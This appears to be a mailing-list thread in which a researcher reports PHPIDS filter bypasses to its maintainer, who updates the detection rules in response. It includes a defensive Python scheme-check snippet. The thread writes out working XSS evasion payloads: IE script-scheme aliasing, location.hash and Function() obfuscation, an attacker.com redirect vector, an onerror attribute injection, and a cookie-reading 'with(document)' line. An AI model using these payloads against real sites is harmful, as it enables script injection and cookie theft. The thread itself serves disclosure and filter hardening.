There are some characteristics in Internet Explorer that could aid
attackers when doing XSS attacks.
In IExplorer:
??script:
and
???script:
are translated to vbscript:
so, for example:
MYscript:msgbox("hi")
or
YOUscript:msgbox("hi")
will be treated as:
vbscript:msgbox("hi")
and anything with:
????script:
will be treated as:
javascript:
so..
somescript:alert("hi");
will be treated as:
javascript:alert("hi");
About PHPIDS:
The following expression is not filtered:
document.location.search.substr(1)
document.location.search returns the variables sent as GET content.
The website:
http://site.com/?something here
document.location.search returns "something here"
There is no filter for document.referrer:
document.referrer.substr(32)
So for example, I could make a website:
http://www.attacker.com/red.php?code-here()
that redirects to the vulnerable site and the program would execute
"code-here()".
!!! --- The filter doesn't make any validation for VBScript. --- !!!
About the rule:
rule: (?:(?:location)?[. ]*hash[. ]*(?:substr(?:ing)?|replace)\s?\()
rule-description: detects self contained xss payload attacks
impact: 4
Ways of avoiding that rule:
document.location.hash.split(document.location.hash.charAt(0)).join()
document.location.hash[String().substr.toString().substr(9,6)](1)
About the rule:
rule: (?:(?:alert|prompt|confirm|dialog|expression|urn|fromCharcode|
decodeURIComponent...
rule-description: detects possible includes and typical script
methods
impact: 5
Ways of avoiding that rule:
window[eval.toString().substr(9,4)](--code_here--)
Function(--code_here--)();
Use of both vulnerabilities, for example:
Function(document.location.hash[String().substr.toString().substr(9,6)]
(1))();
Could lead to running the code inside http://site.com/#code-here
:)
Greetz!!
Att.
sirdarckcat
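As an added example (not code from the thread), the scheme check below encodes the IE behaviour sirdarckcat describes above and shows the defensive takeaway: an href filter has to allow-list schemes rather than deny-list the literal strings "javascript:" and "vbscript:". The alias mapping is taken from the post as stated; it is assumed that each "?" there stands for one arbitrary character, and the allow-list contents are an assumption.

```python
import re

# Alias mapping from the post: a 2- or 3-character prefix before "script:" is
# dispatched by IE as vbscript:, a 4-character prefix as javascript:.
# Assumption: each "?" in the post stands for exactly one arbitrary character.
IE_ALIASES = (
    (re.compile(r"^.{2,3}script$", re.I | re.S), "vbscript"),
    (re.compile(r"^.{4}script$", re.I | re.S), "javascript"),
)

# Assumed allow-list for an href attribute; adjust to the application's needs.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})


def raw_scheme(href):
    """Text before the first ':' in an href, or None for a relative URL.

    Leading whitespace is stripped so ' javascript:' is still seen as a scheme.
    A candidate containing '/', '?' or '#' is not a scheme (RFC 3986), so
    '/path?q=a:b' is treated as relative."""
    href = href.lstrip()
    if ":" not in href:
        return None
    candidate = href.split(":", 1)[0]
    if any(c in candidate for c in "/?#"):
        return None
    return candidate


def ie_effective_scheme(href):
    """Scheme IE would actually dispatch on, according to the post.

    'MYscript:msgbox("hi")' -> 'vbscript', 'somescript:alert(1)' -> 'javascript'.
    Other schemes are returned lower-cased; relative URLs return None."""
    scheme = raw_scheme(href)
    if scheme is None:
        return None
    lowered = scheme.lower()
    if lowered in ("javascript", "vbscript"):
        return lowered
    for pattern, alias in IE_ALIASES:
        if pattern.match(scheme):
            return alias
    return lowered


def is_safe_href(href):
    """Allow-list check: relative URLs pass, any absolute URL must use an
    explicitly allowed scheme. Unknown or aliased schemes are rejected without
    needing to know every browser-specific spelling of javascript:."""
    scheme = raw_scheme(href)
    if scheme is None:
        return True
    return scheme.lower() in ALLOWED_SCHEMES
```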
Welcome to the group and thanks a lot! I will review the suggestions
immediately and upgrade the filter rules. (Wow - I didn't know about
the ???script issue!)
Greetings,
.mario
> Could lead to running the code inside http://site.com/#code-here
>
> :)
> Greetz!!
>
> Att.
> sirdarckcat
Ok - after having stopped shivering I customized the rules and
deployed them to the smoketest. Thanks for the awesome input - very
much appreciated!
Greetings,
.mario
Thanks for the welcome :)
there is another flaw in php-ids filters, this string:
x' y" z" awesome"whatever='something'
will allow me to put anything inside any attribute:
If you see the generated DOM code (in firefox), you can see that:
<a href="x' y" z" awesome"whatever='something'">
and
<a href='x' y" z" awesome"whatever='something''>
and
<a href=x' y" z" awesome"whatever='something'>
will be translated to:
double quoted:
<a href="?test=x%27%20y" z="" awesome="" whatever="something">
single quoted:
<a href="?test=x" y="" z="" awesome="" whatever="something">
no quotes:
<a href="?test=x%27" y="" z="" awesome="" whatever="something">
the important part is:
whatever="something"
I can't put onclick, nor onmousemove, etc., but I think that using
style could lead to exploitation. I'm not really sure.
anyway, if the affected zone instead of being an <a href were <img, I
think I could exploit it successfully.
This may be useful for the XSS cheat list of rsnake..
Greetz!!
the use of "with" is not filtered:
with(document)location.href=cookie;
Greetz!!
Thanks again for your great work - it's a great benefit for the group
to have you aboard!
I just fixed the filter rules and uploaded them for the demo. As far
as I can see they now cover all problems appearing in the slackers
forum and this thread.
x' y" z" awesome"onerror='alert(1)' is now triggering an impact of 13
which I find suitable.
Also the patterns foo(bar), foo["bar"], foo().bar(), and new Function
foo("bar") are now covered - I hope that does it for now ;)
Also I tried to fix the with() issue more effectively although this
rule needs more work.
Greetings!
.mario
I'm having a lot of fun with these filters :P, it's the best challenge
I've seen in a long time
there is another flaw, this is an error in the handling of the new
lines..
for example:
for each(screw
in window)try{screw(code
)}catch(rock_and_roll){1}
after a lot of alerts and confirms, the function "eval" will be
reached, and will execute the code inside the variable code.
The variable code may be input like this:
var code;
code += "alert";
code += "\
(";
code += "document";
code += ".";
code += "cookie";
code += " \
); 123456 ";
Greetz!!
"I'm having a lot of fun with these filters :P, it's the best challenge
I've seen in a long time"
Nice to hear - thanks!
Again very high quality and esoteric stuff! The for each() construct
is now being detected but the concatenation gives me a headache... What
do you guys think - would it be useful to create a concatenation
converter?
Greetings,
.mario